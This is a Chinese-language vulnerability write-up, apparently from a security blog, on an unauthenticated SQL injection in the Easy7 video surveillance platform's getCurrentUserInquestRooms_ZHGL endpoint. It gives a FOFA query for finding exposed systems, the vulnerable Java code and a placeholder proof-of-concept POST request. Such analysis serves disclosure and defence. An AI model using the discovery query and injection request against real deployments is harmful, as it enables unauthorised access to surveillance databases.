天地伟业Easy7 getCurrentUserInquestRooms_ZHGL SQL注入漏洞


漏洞简介

天地伟业Easy7是一款用于视频监控管理的软件系统。

该系统的 /Easy7/rest/inquestRoom/getCurrentUserInquestRooms_ZHGL 接口存在SQL注入漏洞,攻击者可以通过构造恶意请求执行任意SQL语句,可能导致敏感信息泄露或数据库被篡改。

影响版本

fofa语法

body="/Easy7/apps/WebService/LogIn.jsp" || body="Easy7/VideoLib.EXE" || body="/Easy7/index.html" || (body="<img src=\"./images/ico/Easy7_logo_transparent.png") && title="平台"

漏洞分析

首先,该系统基于Spring 3.0,比较古老且WEB-INF/web.xml里没有配置任何filter进行权限校验,因此绝大部分接口都是可以直接访问的。

再来看本次的漏洞接口 /Easy7/rest/inquestRoom/getCurrentUserInquestRooms_ZHGL 对应的 getCurrentUserInquestRooms_ZHGL() 方法实现逻辑

@Controller
@RequestMapping({"/inquestRoom"})
public class CLS_REST_InquestRoom {
    private static final Logger log = LoggerFactory.getLogger(CLS_REST_InquestRoom.class);
    @Resource(
        name = "boInquestRoom"
    )
    private CLS_BO_InquestRoom boInquestRoom;
    @RequestMapping({"/getCurrentUserInquestRooms_ZHGL"})
    public void getCurrentUserInquestRooms_ZHGL(HttpServletRequest request, HttpServletResponse response, String currentCourtFjm) throws Exception {
        response.getWriter().print(JSONObject.fromObject(this.boInquestRoom.getCurrentUserInquestRooms_ZHGL(currentCourtFjm)));
    }

参数currentCourtFjm被直接带入boInquestRoom.getCurrentUserInquestRooms_ZHGL方法

public CLS_VO_Result getCurrentUserInquestRooms_ZHGL(String currentCourtFjm) {
        CLS_VO_Result result = new CLS_VO_Result();
        result.setContent(this.daoInquestRoom.getCurrentUserInquestRooms_ZHGL(currentCourtFjm));
        result.setRet(0);
        return result;
    }

继续跟进 daoInquestRoom.getCurrentUserInquestRooms_ZHGL(currentCourtFjm)方法

最终在dao层,参数currentCourtFjm是未经任何过滤或校验就被直接拼接进"AND ROOM.S_SX_CODE = '" + currentCourtFjm + "'"SQL语句中执行,从而造成SQL注入漏洞。

漏洞复现

POST /Easy7/rest/inquestRoom/getCurrentUserInquestRooms_ZHGL HTTP/1.1
Host: easy7.mrxn.net
Content-Type: application/x-www-form-urlencoded

currentCourtFjm=SQLI_POC

成功延时5秒


手机扫码阅读

深信服运维安全管理系统 add_DNS 远程命令执行漏洞

用友U8Cloud /u8cloud/openapi/ce.paper.query SQL 注入漏洞

评 论